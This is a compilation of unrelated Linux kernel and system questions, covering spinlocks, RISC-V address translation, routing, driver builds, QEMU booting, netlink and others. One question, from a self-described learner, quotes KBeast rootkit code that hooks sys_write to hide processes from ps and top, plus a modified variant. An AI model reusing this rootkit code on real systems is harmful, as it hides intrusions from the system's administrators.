For the same computer, when the Linux operating system boots, is the executed instruction stream always the same? I guess it might be but I am not sure. Any help will be welcome!
Cheers,
There are many Q&As about spinlocks, but it's still confusing to me. I think it's because the questions and answers assume different settings or do not clearly explain the settings, such as whether it's SMP or whether it's a preemptive kernel, when they ask or answer (and some old info is mixed in too).
My first question is: (Q1) in an SMP situation, is schedule() run on every processor concurrently (I know the scheduling starts by the jiffies timer interrupt)? I'll assume yes in my question below. I would appreciate it if someone could briefly explain to me how processes move among processor cores during scheduling too.
I'm trying to understand how, why, and when spin_lock/unlock_irqsave is used. Here is my question.
Suppose there is code which calls spin_lock_irqsave, and the interrupt state (enable) was 'disable' at the time of calling spin_lock_irqsave(). Could this code be running in interrupt context? Probably not, because the ISR should not have kicked in in the first place if interrupts were disabled on the corresponding local processor. Therefore, the code calling spin_lock_irqsave must be in process context. OK, the interrupt had been disabled previously, but a process is trying to lock with spin_lock_irqsave.
In what case could the interrupt have been disabled? I think there are two cases.
Case 1: a previous interrupt routine had been preempted by this process (which is calling this spin_lock_irqsave). This is weird because an ISR cannot be preempted. (Q2) By the way, in a preemptive kernel, can an ISR be preempted by a process? (Q3) I guess because preempt_count() is #defined as (current_thread_info()->preempt_count), preempt_disable only works for processes and not interrupts. Do interrupts also have the current thread info?
Case 2: a previous normal process had acquired the lock with spin_lock_irq (or irqsave). But this is also weird because before locking, spin_lock_irq (or irqsave) disables preemption and interrupts for the task, telling the scheduler not to switch to another task after the scheduler timer interrupt. So this case cannot be true.
I know I have to look further about process scheduling for SMP and kernel preemption, and maybe I am misunderstanding something. Could somebody clear things up in my question? Thanks a lot for reading.
I am running a simulated RV64GC core in QEMU and am trying to better understand the virtual memory subsystem and address translation process in RISC-V. My simulated system runs with OpenSBI, the Linux kernel v5.5, and a minimal rootfs.
In QEMU debug traces, I see that sometimes (most commonly with ecalls) control is passed to the SBI and the addresses change from kernel (virtual?) addresses with an offset of 0xffffffe000000000 into something that looks like real, physical, addresses in RAM. For example,
...
0xffffffe00003a192: 00000073 ecall
...
IN: sbi_ecall_0_1_handler
0x0000000080004844: 00093603 ld a2,0(s2)
0x0000000080004848: 4785 addi a5,zero,1
0x000000008000484a: 00a797b3 sll a5,a5,a0
...
In the RISC-V privileged specification version 1.11, section 4.1.12, the satp CSR (control and state register) is defined to have a MODE field that determines address translation designation. A MODE of 0 means that translation is bare (addresses are considered physical), a MODE of 8 or 9 requires Sv39 or Sv48 page-based virtual addressing, respectively, and any other MODE values are reserved.
Now, both the RISC-V privileged and unprivileged specifications don't seem to mention when satp may be changed (other than with csrrw), so this leads me to the following questions:
When control is handed to the SBI (as with the ecall above), does the satp MODE change to 0? If yes, does this mean the satp mode should be reset on a u/s/mret instruction? Are there other instances (other than csrrw) where satp is supposed to change?
If not, is there some other mechanism by which the addresses are interpreted and designated as physical? Or are the addresses (the 0x80XXXXXX addresses above) instead considered virtual and should go through the usual virtual address translation process (as outlined in section 4.3.2 of the RISC-V privileged specification)? If this is the case, when are page table entries created for this?
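The satp fields and the Sv39 address split that the question refers to, as an added example that is not part of the original post: it decodes a satp value, checks whether an address is a valid Sv39 virtual address, and computes where the first page-table entry of the section 4.3.2 walk would be read. The satp value is constructed for illustration, and the function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>

/* RV64 satp layout (privileged spec 1.11, section 4.1.12):
 * MODE = bits 63:60, ASID = bits 59:44, PPN = bits 43:0. */
enum { SATP_BARE = 0, SATP_SV39 = 8, SATP_SV48 = 9 };

struct satp_fields {
    unsigned mode;
    unsigned asid;
    uint64_t root_pa;   /* physical address of the root page table */
};

struct satp_fields satp_decode(uint64_t satp)
{
    struct satp_fields f;
    f.mode = (unsigned)(satp >> 60);
    f.asid = (unsigned)((satp >> 44) & 0xffff);
    f.root_pa = (satp & ((1ULL << 44) - 1)) << 12;  /* PPN * 4 KiB */
    return f;
}

/* Sv39 requires bits 63:39 to equal bit 38; anything else page-faults. */
int sv39_is_canonical(uint64_t va)
{
    uint64_t upper = va >> 38;            /* bits 63:38, 26 bits */
    return upper == 0 || upper == 0x3ffffff;
}

/* 9-bit table index for a level: 2 = root table, 0 = leaf table. */
unsigned sv39_vpn(uint64_t va, int level)
{
    return (unsigned)((va >> (12 + 9 * level)) & 0x1ff);
}

/* First step of the section 4.3.2 walk: address of the root-level PTE
 * (root table base + VPN[2] * 8-byte PTE). Returns 0 when satp is not in
 * Sv39 mode (e.g. Bare, where no walk happens) or va is not canonical. */
uint64_t sv39_root_pte_addr(uint64_t satp, uint64_t va)
{
    struct satp_fields f = satp_decode(satp);
    if (f.mode != SATP_SV39 || !sv39_is_canonical(va))
        return 0;
    return f.root_pa + 8ULL * sv39_vpn(va, 2);
}

int main(void)
{
    uint64_t satp = 0x8000000000080200ULL;  /* constructed: Sv39, ASID 0, PPN 0x80200 */
    uint64_t va = 0xffffffe00003a192ULL;    /* ecall address from the trace */
    printf("mode=%u VPN[2..0]=%#x,%#x,%#x off=%#x root PTE at %#llx\n",
           satp_decode(satp).mode, sv39_vpn(va, 2), sv39_vpn(va, 1),
           sv39_vpn(va, 0), (unsigned)(va & 0xfff),
           (unsigned long long)sv39_root_pte_addr(satp, va));
    return 0;
}
```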
I'm trying to learn how rootkits work (for educational purposes). I have the source code of the Kbeast rootkit. To hide a process from the ps, pstree etc. commands it has the following function,
    asmlinkage int h4x_write(unsigned int fd, const char __user *buf, size_t count)
    {
        int r;
        char *kbuf = (char *)kmalloc(256, GFP_KERNEL);
        copy_from_user(kbuf, buf, 255);
        if ((strstr(current->comm, "ps")) || (strstr(current->comm, "pstree")) ||
            (strstr(current->comm, "top")) || (strstr(current->comm, "lsof"))) {
            if (strstr(kbuf, _H4X0R_) || strstr(kbuf, KBEAST)) {
                kfree(kbuf);
                return -ENOENT;
            }
        }
        r = (*o_write)(fd, buf, count);
        kfree(kbuf);
        return r;
    }
This function overrides sys_call_table[__NR_write]. My understanding is that *buf contains the name of the process it is trying to hide. Using copy_from_user(), buf is copied into a kernel buffer kbuf, and then upon detecting the ps||pstree||... command using strstr(), it looks for the process_to_hide (H4X0R). If a match is found, then it frees the kernel buffer kbuf. Is my understanding correct?
I checked the content of buf. It contains nothing, therefore it never works.
To make it work, I did a little workaround (not sure if this is the right approach, as I said I'm a beginner). I did the following, to put the process name (the process that I'm trying to hide) into the buf, then use copy_from_user() to copy it into the kernel space. I've a working code that looks like original Kbeast code,
    const char *p_name="kbeast";
    asmlinkage long test_write(unsigned int fd, char const __user *buf, size_t count)
    {
        long r=1;
        r = (*original_write)(fd, buf, count);
        char *kbuf=(char const *)kmalloc(256,GFP_KERNEL);
        //__copy_from_user(kbuf,buf,255);
        if (strstr(current->comm,"ps")){
            struct task_struct *task;
            for_each_process(task){
                if (strstr(task->comm,p_name)){
                    //printk("%s [%d]\n",task->comm , task->pid);
                    buf=task->comm;
                    __copy_from_user(kbuf,buf,255);
                    break;
                }
            }
            //printk(KERN_INFO "kBuf %s", kbuf);
            if(strstr(kbuf,p_name)){
                kfree(kbuf);
                return -ENOENT;
            }
        }
        return r;
    }
Upon running the ps command, it shows the following,
      PID TTY          TIME CMD
    10115 pts/2    00:00:00 bash
    14560 pts/2    00:00:00 kbeast
    14561 pts/2    00:00:00 ps
    ps: write error
What is happening here?
I was thinking of another approach: as the task_struct linked list contains all the process names, if I can somehow unlink the target process from task_struct that should do the trick, but I do not have any idea how to do that.
eth0:
    ip add add 172.18.13.222/21 dev eth0
    ip add add 172.18.13.223/21 dev eth0
    ip rule add from 172.18.13.222 lookup 100
    ip route add default via 172.18.9.2 dev eth0
    ip route add default via 172.18.8.1 dev eth0 table 100
two gateway: 172.18.9.2 (default), 172.18.8.1 (PBR. It is routed to the source IP policy)
172.18.13.222 is first ip
172.18.13.223 is secondary ip
    ping xxx #Does not work without specifying the source IP
Source IP is not specified: ping packet->gw:172.18.9.2->xxx server (The policy route does not take effect)
    ping -I 172.20.0.2 xxx #Specifies that the source IP works properly
Specify the source IP: ping packet->gw:172.18.8.1->xxx server (Policy routing takes effect)
    curl xxxx #Specifies that the source IP works properly
:curl(http packet)-->gw:172.18.8.1->http server (Policy routing takes effect)
Why is that?
Sorry, I don't know how to make the picture show directly
Can't install any linux driver (kde neon 5.18)
example:
    root@Casual-PC:/home/casual/veikk-linux-driver# make all install
    make -C /lib/modules/5.3.0-42-generic/build M=/home/casual/veikk-linux-driver modules
    make[1]: Entering directory '/usr/src/linux-headers-5.3.0-42-generic'
      Building modules, stage 2.
      MODPOST 1 modules
    make[1]: Leaving directory '/usr/src/linux-headers-5.3.0-42-generic'
    make -C /lib/modules/5.3.0-42-generic/build M=/home/casual/veikk-linux-driver modules_install
    make[1]: Entering directory '/usr/src/linux-headers-5.3.0-42-generic'
      INSTALL /home/casual/veikk-linux-driver/veikk.ko
    At main.c:160:
    - SSL error:02001002:system library:fopen:No such file or directory: ../crypto/bio/bss_file.c:72
    - SSL error:2006D080:BIO routines:BIO_new_file:no such file: ../crypto/bio/bss_file.c:79
    sign-file: certs/signing_key.pem: No such file or directory
      DEPMOD 5.3.0-42-generic
    Warning: modules_install: missing 'System.map' file. Skipping depmod.
    make[1]: Leaving directory '/usr/src/linux-headers-5.3.0-42-generic'
    modprobe veikk
    modprobe: FATAL: Module veikk not found in directory /lib/modules/5.3.0-42-generic
    Makefile:14: recipe for target 'install' failed
    make: *** [install] Error 1
I am trying to run a custom Linux kernel version 2.6.26 on QEMU with a busybox for i386 target but it fails at the end of the kernel booting with these two messages:
No filesystem could mount root, tried: reiserfs ext3 ext2 msdos vfat iso9660
Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(1,0)
I don't understand what I am skipping in my work to get into this, but the steps I have made are as follows:
I downloaded the Linux kernel source from the official site and build it with the following commands
    make i386_defconfig
    make CC="gcc" -j$(nproc)
And I wrote a simple script to build a root file system for the kernel using busybox 1.24.1
The script:
    mkdir -p rootfs
    curr_location=$(pwd)
    cd rootfs
    mkdir -p bin boot dev etc lib proc root \
    sbin media sys tmp var usr etc/init.d \
    usr/bin usr/sbin usr/lib
    echo "#!/bin/sh"> etc/init.d/rcS
    echo "PATH=/sbin:/bin:/usr/sbin:/usr/bin">> etc/init.d/rcS
    echo "export PATH">> etc/init.d/rcS
    echo "/bin/mount -t proc proc /proc">> etc/init.d/rcS
    echo "/bin/mount -t sysfs sysfs /sys">> etc/init.d/rcS
    echo "/sbin/mdev -s">> etc/init.d/rcS
    echo "/bin/hostname yahiafarghaly">> etc/init.d/rcS
    echo "/bin/echo ''">> etc/init.d/rcS
    echo "/bin/echo 'init.d is called!'">> etc/init.d/rcS
    echo "/bin/echo ''">> etc/init.d/rcS
    chmod +x etc/init.d/rcS
    touch etc/group etc/passwd etc/shadow etc/profile
    echo "root:x:0:"> etc/group
    echo "root:x:0:0:root:/root:/bin/sh"> etc/passwd
    echo "root::10:0:0:0:::"> etc/shadow
    echo "export PS1='Shell$'"> etc/profile
    echo "export USER=`id -un`">> etc/profile
    echo "export HISTSIZE=1000">> etc/profile
    echo "echo 'Hello Sh !'">> etc/profile
    echo "echo """>> etc/profile
    busybox_ver=1.24.1
    cd ~/P0/linux_study/busybox/busybox-$busybox_ver
    make defconfig
    make CONFIG_STATIC=y \
        CONFIG_EXTRA_CFLAGS="-m32 -march=i386" \
        CONFIG_EXTRA_LDFLAGS="-m32" \
        CONFIG_PREFIX=$curr_location/rootfs \
        CC="gcc" -j$(nproc) install
    cd $curr_location/rootfs
    find -print0 | cpio -0oH newc | gzip -9 > ../rootfs.img
So now, I have both the kernel and a file system image to fully boot to the Linux shell. I have used the QEMU command as follows:
    qemu-system-i386 \
        -kernel ./kernel/kernel_image_2.6.26 \
        -nographic \
        -append "root=/dev/ram init=/sbin/init console=ttyS0 nokaslr" \
        -initrd rootfs.img \
        -m 512 \
        --enable-kvm \
        -cpu host
I don't know why QEMU cannot recognize the initial ram disk file. What am I missing?
I got this error all over the place. I don't know what this error means, so I also can't fix it.
I am using Ubuntu 18.04 LTS.
kernel: [4575051.649177] EXT4-fs error (device loop10): ext4_find_extent:913: inode #393377: comm systemd-journal: pblk 1611801 bad header/extent: invalid magic - magic 0, entries 0, max 0(0), depth 0(0)
I am developing a system monitoring tool in Python that must have, as one of its functionalities, logging me into a system (specifically, my own Linux Mint system) on booting. Rather than having me type the password, I want my program to do it on my voice command. But I couldn't figure out a way to access the password field on the login widget where I can ask my program to fill it in for me. How exactly should I design the system to support such functionality?
I have been trying to run Virtual Box on Ubuntu 18.04 but I keep getting an error.
Kernel driver not installed (rc=-1908)
The VirtualBox Linux kernel driver is either not loaded or not set up correctly. Please try setting it up again by executing
'/sbin/vboxconfig'
as root.
If your system has EFI Secure Boot enabled you may also need to sign the kernel modules (vboxdrv, vboxnetflt, vboxnetadp, vboxpci) before you can load them. Please see your Linux system's documentation for more information.
where: suplibOsInit what: 3 VERR_VM_DRIVER_NOT_INSTALLED (-1908) - The support driver is not installed. On linux, open returned ENOENT.
So I try running sudo /sbin/vboxconfig, and I get the following errors:
    sudo /sbin/vboxconfig
    [sudo] password for user:
    vboxdrv.sh: Stopping VirtualBox services.
    vboxdrv.sh: Starting VirtualBox services.
    vboxdrv.sh: Building VirtualBox kernel modules.
    This system is currently not set up to build kernel modules.
    Please install the Linux kernel "header" files matching the current kernel
    for adding new hardware support to the system.
    The distribution packages containing the headers are probably:
        linux-headers-generic linux-headers-4.18.12-041812-generic
    This system is currently not set up to build kernel modules.
    Please install the Linux kernel "header" files matching the current kernel
    for adding new hardware support to the system.
    The distribution packages containing the headers are probably:
        linux-headers-generic linux-headers-4.18.12-041812-generic
    There were problems setting up VirtualBox. To re-start the set-up process, run
        /sbin/vboxconfig
    as root. If your system is using EFI Secure Boot you may need to sign the
    kernel modules (vboxdrv, vboxnetflt, vboxnetadp, vboxpci) before you can load
    them. Please see your Linux system's documentation for more information.
If I try installing the Linux headers I get:
    sudo apt-get install linux-headers-$(uname -r)
    [sudo] password for user:
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    Package linux-headers-4.18.12-041812-generic is not available, but is referred to by another package.
    This may mean that the package is missing, has been obsoleted, or
    is only available from another source
    E: Package 'linux-headers-4.18.12-041812-generic' has no installation candidate
So how should I fix this so I can run Vbox? Should I upgrade my kernel?
Is there a function like sprintf() in the Linux kernel (like printf() -> printk())?
I am using an HP laptop, model Omen dc-1093tx, and I'm on the Linux operating system (Pop!_OS). I'm facing heating issues: the fans are running at the minimum speed and I'm unable to boost the fan speed manually. Can anyone help me with this? Any help will be appreciated.
This is my virt-manager virtio macvtap setting:
    <interface type='direct' trustGuestRxFilters='yes'>
      <mac address='52:54:00:b7:7d:c2'/>
      <source dev='eth20' mode='passthrough'/>
      <model type='virtio'/>
      <driver name='vhost' queues='4'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
Because multiple RX-Queues are supported, I am wondering whether it is possible to do Receive Side Steering. This means I am basically able to tell the NIC where I want specific packets to arrive, such as
    ethtool -N eth1 flow-type udp4 dst-ip 10.1.1.1 action 0
which would send all packets with dst-ip 10.1.1.1 on RX-Queue 0. But if I try to set an ethtool rule I get this error:
rxclass: Cannot get RX class rule count: Operation not supported
In my opinion it doesn't really make sense to enable multiqueue without flow steering because otherwise it is not possible to do performant load distribution on multiple CPUs.
task_struct is used to store the status of the CPU and the trap frame does the same thing, so how do they differ? And is the trap frame a data struct or just a concept?
I was reading the MDS attack paper RIDL: Rogue In-Flight Data Load. They set pages as write-back, write-through, write-combined or uncacheable and with different experiments determine that the Line Fill Buffer is the cause of the micro-architectural leaks.
On a tangent: I was aware that memory can be uncacheable, but I assumed that cacheable data was always cached in a write-back cache, i.e. I assumed that the L1, L2 and LLC were always write-back caches.
I read up on the differences between write-back and write-through caches in my Computer Architecture book. It says:
Write-through caches are simpler to implement and can use a write buffer that works independently of the cache to update memory. Furthermore, read misses are less expensive because they do not trigger a memory write. On the other hand, write-back caches result in fewer transfers, which allows more bandwidth to memory for I/O devices that perform DMA. Further, reducing the number of transfers becomes increasingly important as we move down the hierarchy and the transfer times increase. In general, caches further down the hierarchy are more likely to use write-back than write-through.
So a write-through cache is simpler to implement. I can see how that can be an advantage. But if the caching policy is settable by the page table attributes then there can't be an implementation advantage - every cache needs to be able to work in either write-back or write-through.
I'm interested in using netlink for a straightforward application (reading cgroup stats at high frequency).
The man page cautions that the protocol is not reliable, hinting that the application needs to be prepared to handle dropped packets:
However, reliable transmissions from kernel to user are impossible in any case. The kernel can't send a netlink message if the socket buffer is full: the message will be dropped and the kernel and the user-space process will no longer have the same view of kernel state. It is up to the application to detect when this happens (via the ENOBUFS error returned by recvmsg(2)) and resynchronize.
Since my requirements are simple, I'm fine with just destroying the socket and creating a new one whenever anything unexpected happens. But I can't find any documentation on what the expectations are on my program—the man page for recvmsg(2) doesn't even mention ENOBUFS for example.
What all do I need to worry about in order to make sure I can tell that a request from my application or a response from the kernel has been dropped, so that I can reset everything and start over? It's clear to me that I could do so whenever I receive an error from any of the syscalls involved, but for example what happens if my request is dropped on the way to the kernel? Will I just never receive a response? Do I need to build a timeout mechanism where I wait only so long for a response?
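One way to structure the "reset on anything unexpected" receive path described in the question, as an added example that is not part of the original post or of the netlink man page. It assumes a request/response pattern in which the application stamps each request with a sequence number and expects the reply to carry the same nlmsg_seq; the names nl_recv_checked and nl_status are hypothetical.

```c
#include <errno.h>
#include <poll.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/netlink.h>

enum nl_status { NL_OK, NL_TIMEOUT, NL_RESYNC };

/* Wait up to timeout_ms for one reply datagram on fd and validate it.
 * NL_TIMEOUT: nothing arrived before the deadline.
 * NL_RESYNC:  the reply cannot be trusted; close the socket and start over. */
enum nl_status nl_recv_checked(int fd, void *buf, size_t cap, size_t *len,
                               unsigned int expected_seq, int timeout_ms)
{
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    struct iovec iov = { .iov_base = buf, .iov_len = cap };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1 };
    struct nlmsghdr hdr;
    ssize_t n;
    int ready;

    do {
        ready = poll(&pfd, 1, timeout_ms);
    } while (ready < 0 && errno == EINTR);
    if (ready == 0)
        return NL_TIMEOUT;
    if (ready < 0)
        return NL_RESYNC;

    do {
        n = recvmsg(fd, &msg, 0);
    } while (n < 0 && errno == EINTR);
    if (n < 0)                          /* ENOBUFS lands here: messages were dropped */
        return NL_RESYNC;
    if (msg.msg_flags & MSG_TRUNC)      /* buf was too small, tail discarded */
        return NL_RESYNC;
    if ((size_t)n < sizeof hdr)         /* too short to hold a netlink header */
        return NL_RESYNC;

    memcpy(&hdr, buf, sizeof hdr);      /* copy out: buf may be unaligned */
    if (hdr.nlmsg_len < sizeof hdr || hdr.nlmsg_len > (size_t)n)
        return NL_RESYNC;
    if (hdr.nlmsg_seq != expected_seq)  /* stale reply or not ours */
        return NL_RESYNC;

    *len = (size_t)n;
    return NL_OK;
}
```

The caller treats NL_TIMEOUT the same way as NL_RESYNC if it cannot tell whether the request itself was lost: close the socket, open a new one, and reissue the request with a fresh sequence number.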
I am working on a kernel driver for an embedded project using serial communication. I would like to test whether enabling low latency on the serial port could improve the performance.
Setting bit ASYNC_LOW_LATENCY in serial_struct flags field and calling TIOCSSERIAL ioctl function results in error:
-22 EINVAL
Is there anything I am missing?
Something in kernel config?
Can someone explain rbin memory in the Android kernel? Anything would be helpful. I am new to the kernel and trying to understand the memory management concept where we reserve some memory for specific processes like the camera. Also please give some direction on where I can learn more about this. Any help will be much appreciated. Can you please tell me where I can learn about RBIN? Please, it's really urgent.
I need information about the following block (disk I/O) events available in perf. Can you tell me where I can get detailed information about each event?
    block:block_bio_backmerge
    block:block_bio_bounce
    block:block_bio_complete
    block:block_bio_frontmerge
    block:block_bio_queue
    block:block_bio_remap
    block:block_dirty_buffer
    block:block_getrq
    block:block_plug
    block:block_rq_complete
    block:block_rq_insert
    block:block_rq_issue
    block:block_rq_remap
    block:block_rq_requeue
    block:block_sleeprq
    block:block_split
    block:block_touch_buffer
    block:block_unplug
Please help me with this.
I am dual booting ubuntu 18.04.4 on my lenovo g5070 along with my windows 8.1.
I am getting error 'unable to find a medium containing a live file system'.
I checked the checksum of downloaded iso file.
I am using bootable pendrive.